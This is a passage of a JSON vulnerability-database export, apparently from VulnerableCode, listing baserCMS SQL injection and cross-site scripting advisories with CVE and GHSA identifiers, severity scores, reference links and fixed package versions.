,"scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41994"},{"reference_url":"https://github.com/advisories/GHSA-vxwf-79ch-f7f7","reference_id":"GHSA-vxwf-79ch-f7f7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vxwf-79ch-f7f7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/146599?format=json","purl":"pkg:composer/baserproject/basercms@4.7.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zxns-tzw3-27fr"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2"}],"aliases":["CVE-2022-41994","GHSA-vxwf-79ch-f7f7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k575-suuf-7bhf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90792?format=json","vulnerability_id":"VCID-k5qv-4yp3-zbgf","summary":"baserCMS has an SQL injection vulnerability in its blog post functionality\nbaserCMS has a SQL 
injection vulnerability in blog posts.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n\nMalicious SQL may be executed in blog posts.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_52157568\n\n### Credits\n\nMirai Matsumoto@Future Secure Wave, Inc.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27697","reference_id":"","reference_type":"","scores":[{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02096","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27697"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-3
1T15:27:51Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27697","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27697"},{"reference_url":"https://github.com/advisories/GHSA-vh89-rjph-2g7p","reference_id":"GHSA-vh89-rjph-2g7p","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-vh89-rjph-2g7p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-27697","GHSA-vh89-rjph-2g7p"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k5qv-4yp3-zbgf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56066?format=json","vulnerability_id":"VCID-khft-xvrw-g3dr","summary":"baserCMS has a Cross-site Scripting (XSS) Vulnerability in HTTP 400 Bad Request\nXSS vulnerability in HTTP 400 Bad Request to 
baserCMS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46995","reference_id":"","reference_type":"","scores":[{"value":"0.0087","scoring_system":"epss","scoring_elements":"0.75582","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46995"},{"reference_url":"https://basercms.net/security/JVN_00876083","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN_00876083"},{"reference_url":"https://basercms.net/security/JVN_06274755","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/"}],"url":"https://basercms.net/security/JVN_06274755"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46995","reference_id":"CVE-2024-46995","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46995"},{"reference_url":"https://
github.com/advisories/GHSA-mr7q-fv7j-jcgv","reference_id":"GHSA-mr7q-fv7j-jcgv","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-mr7q-fv7j-jcgv"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv","reference_id":"GHSA-mr7q-fv7j-jcgv","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83045?format=json","purl":"pkg:composer/baserproject/basercms@5.1.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"}],"aliases":["CVE-2024-46995","GHSA-mr7q-fv7j-jcgv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-khft-xvrw-g3dr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/110302?format=json","vulnerability_id":"VCID-kmpp-6j49-pqfz","summary":"baserproject/basercms vulnerable to cross-site scripting (XSS) vulnerability\nThere is a cross-site scripting vulnerability on the management system of 
baserCMS.\n\nThis is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.\nIf you are eligible, please update to the new version as soon as possible.\n\n### Target\nbaserCMS 4.7.1 and earlier versions.\n\n### Vulnerability\nExecution of malicious JavaScript code may alter the display of the page or leak cookie information.\n- In Favorite registration (CVE-2022-39325)\n- In Permission Settings (CVE-2022-41994)\n- In User group management (CVE-2022-42486)\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\n### Credits\n- Shogo Iyota@Mitsui Bussan Secure Directions, Inc.\n- YUYA KOTAKE@CARTA HOLDINGS, INC.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-39325","reference_id":"","reference_type":"","scores":[{"value":"0.00687","scoring_system":"epss","scoring_elements":"0.72163","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00687","scoring_system":"epss","scoring_elements":"0.72122","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-39325"},{"reference_url":"https://basercms.net/security/JVN_53682526","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/"}],"url":"https://basercms.net/security/JVN_53682526"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/b6f8a54
e90dee51317eddf517b776fe8b4cd3ef6","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/"}],"url":"https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-39325","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-39325"},{"reference_url":"https://github.com/advisories/GHSA-395x-wv32-44v5","reference_id":"GHSA-395x-wv32-44v5","reference_type":""
,"scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-395x-wv32-44v5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/146599?format=json","purl":"pkg:composer/baserproject/basercms@4.7.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zxns-tzw3-27fr"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2"}],"aliases":["CVE-2022-39325","GHSA-395x-wv32-44v5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kmpp-6j49-pqfz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56058?format=json","vulnerability_id":"VCID-mfm9-gsh3-ubg8","summary":"baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts Feature\nXSS vulnerability in Blog posts feature to 
baserCMS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46996","reference_id":"","reference_type":"","scores":[{"value":"0.01236","scoring_system":"epss","scoring_elements":"0.79576","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46996"},{"reference_url":"https://basercms.net/security/JVN_00876083","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/"}],"url":"https://basercms.net/security/JVN_00876083"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46996","reference_id":"CVE-2024-46996","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46996"},{"reference_url":"https://github.com/advisories/GHSA-66jv-qrm3-vvfg","reference_id":"GHSA-66jv-qrm3-vvfg"
,"reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-66jv-qrm3-vvfg"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg","reference_id":"GHSA-66jv-qrm3-vvfg","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83045?format=json","purl":"pkg:composer/baserproject/basercms@5.1.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"}],"aliases":["CVE-2024-46996","GHSA-66jv-qrm3-vvfg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mfm9-gsh3-ubg8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/47109?format=json","vulnerability_id":"VCID-nxrf-64er-xbfx","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nbaserCMS is a website development framework. 
Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-26128","reference_id":"","reference_type":"","scores":[{"value":"0.02281","scoring_system":"epss","scoring_elements":"0.85006","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-26128"},{"reference_url":"https://basercms.net/security/JVN_73283159","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/"}],"url":"https://basercms.net/security/JVN_73283159"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/"}],"url":"https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-26128","reference_id":"CVE-2024-26128","reference_type":"","scores":[{"value":"5.4","scori
ng_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-26128"},{"reference_url":"https://github.com/advisories/GHSA-jjxq-m8h3-4vw5","reference_id":"GHSA-jjxq-m8h3-4vw5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jjxq-m8h3-4vw5"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5","reference_id":"GHSA-jjxq-m8h3-4vw5","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/69105?format=json","purl":"pkg:composer/baserproject/basercms@5.0.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9"}],"aliases":["CVE-2024-26128","GHSA-jjxq-m8h3-4vw5
"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nxrf-64er-xbfx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56065?format=json","vulnerability_id":"VCID-p695-t9ye-v3ga","summary":"baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature\nXSS vulnerability in Edit Email Form Settings Feature to baserCMS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46998","reference_id":"","reference_type":"","scores":[{"value":"0.01064","scoring_system":"epss","scoring_elements":"0.7805","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46998"},{"reference_url":"https://basercms.net/security/JVN_00876083","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN_00876083"},{"reference_url":"https://basercms.net/security/JVN_98693329","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/"}],"url":"https://basercms.net/security/JVN_98693329"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_element
s":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46998","reference_id":"CVE-2024-46998","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46998"},{"reference_url":"https://github.com/advisories/GHSA-p3m2-mj3j-j49x","reference_id":"GHSA-p3m2-mj3j-j49x","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-p3m2-mj3j-j49x"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x","reference_id":"GHSA-p3m2-mj3j-j49x","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA: